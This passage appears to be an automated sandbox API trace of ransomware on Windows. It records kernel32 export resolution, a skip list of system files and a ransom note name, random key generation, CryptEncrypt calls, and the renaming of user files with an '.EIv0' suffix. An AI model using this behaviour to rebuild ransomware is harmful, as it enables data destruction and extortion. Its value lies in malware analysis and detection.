lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.880] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.880] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.880] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.880] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.880] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.880] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.880] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.880] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.880] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.880] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.880] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.880] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.880] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.880] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.880] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.880] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.880] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.880] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.880] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.880] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.880] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.880] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.880] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.880] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.881] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.881] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.881] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.881] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.881] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.881] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.881] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.881] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.881] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.881] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.881] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.881] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xMpLxLM2esbvdeLtC.mp4") returned 58 [0087.881] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xMpLxLM2esbvdeLtC.mp4.EIv0") returned 63 [0087.881] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xMpLxLM2esbvdeLtC.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xmplxlm2esbvdeltc.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xMpLxLM2esbvdeLtC.mp4.EIv0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xmplxlm2esbvdeltc.mp4.eiv0"), dwFlags=0x0) returned 1 [0087.882] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.882] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.882] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.882] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe086d690, ftCreationTime.dwHighDateTime=0x1d4c8a1, ftLastAccessTime.dwLowDateTime=0x59e45d10, ftLastAccessTime.dwHighDateTime=0x1d4cca7, ftLastWriteTime.dwLowDateTime=0x59e45d10, ftLastWriteTime.dwHighDateTime=0x1d4cca7, nFileSizeHigh=0x0, nFileSizeLow=0x133ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_EoDt9ig1S-.swf", cAlternateFileName="_EODT9~1.SWF")) returned 1 [0087.882] lstrcmpiW (lpString1="_EoDt9ig1S-.swf", lpString2="DECRYPT-FILES.txt") returned -1 [0087.882] lstrcmpiW (lpString1="_EoDt9ig1S-.swf", lpString2="autorun.inf") returned -1 [0087.882] lstrcmpiW (lpString1="_EoDt9ig1S-.swf", lpString2="boot.ini") returned -1 [0087.882] lstrcmpiW (lpString1="_EoDt9ig1S-.swf", lpString2="desktop.ini") returned -1 [0087.883] lstrcmpiW (lpString1="_EoDt9ig1S-.swf", lpString2="ntuser.dat") returned -1 [0087.883] lstrcmpiW (lpString1="_EoDt9ig1S-.swf", lpString2="iconcache.db") returned -1 [0087.883] lstrcmpiW (lpString1="_EoDt9ig1S-.swf", lpString2="bootsect.bak") returned -1 [0087.883] lstrcmpiW (lpString1="_EoDt9ig1S-.swf", lpString2="ntuser.dat.log") returned -1 [0087.883] lstrcmpiW (lpString1="_EoDt9ig1S-.swf", lpString2="thumbs.db") returned -1 [0087.883] lstrcmpiW (lpString1="_EoDt9ig1S-.swf", lpString2="Bootfont.bin") returned -1 [0087.883] lstrlenW (lpString="_EoDt9ig1S-.swf") returned 15 [0087.883] lstrcmpiW (lpString1="swf", lpString2="lnk") returned 1 [0087.883] lstrcmpiW (lpString1="swf", lpString2="exe") returned 1 [0087.883] lstrcmpiW (lpString1="swf", lpString2="sys") returned -1 [0087.883] lstrcmpiW (lpString1="swf", lpString2="dll") returned 1 [0087.883] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0087.883] lstrlenW (lpString="_EoDt9ig1S-.swf") returned 15 [0087.883] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0087.883] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="_EoDt9ig1S-.swf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_EoDt9ig1S-.swf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_EoDt9ig1S-.swf" [0087.883] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.883] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_EoDt9ig1S-.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_eodt9ig1s-.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0087.883] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=78828) returned 1 [0087.883] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0087.883] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.884] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.884] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.884] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.884] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0087.884] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0087.886] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.886] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.887] CloseHandle (hObject=0x414) returned 1 [0087.887] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.887] WriteFile (in: hFile=0x410, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0087.888] CloseHandle (hObject=0x0) returned 0 [0087.888] CloseHandle (hObject=0x410) returned 1 [0087.888] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.889] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.889] GetTickCount () returned 0x114e6a8 [0087.889] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.889] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.889] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.889] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.890] lstrlenA (lpString="kernel32.dll") returned 12 [0087.890] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.890] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.890] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.890] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.890] lstrlenA (lpString="ADDATOMA") returned 8 [0087.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.890] lstrlenA (lpString="ADDATOMW") returned 8 [0087.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.890] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.890] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.890] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.890] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.890] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.890] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.890] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.890] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.890] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.891] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.891] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.891] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.891] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.891] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.891] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.891] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.891] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.891] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.891] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.891] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.891] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.891] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.891] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.891] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.891] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.891] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.891] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.892] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.892] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.892] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.892] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.892] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.892] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.892] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.892] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.892] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.892] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.892] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.892] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.892] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.892] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.892] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.892] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.892] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.892] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.893] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.893] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.893] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.893] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.893] lstrlenA (lpString="BEEP") returned 4 [0087.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.893] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.893] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.893] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.893] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.893] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.893] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.893] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.893] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.893] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.893] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.893] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.893] lstrlenA (lpString="CANCELIO") returned 8 [0087.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.893] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.894] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.894] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.894] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" 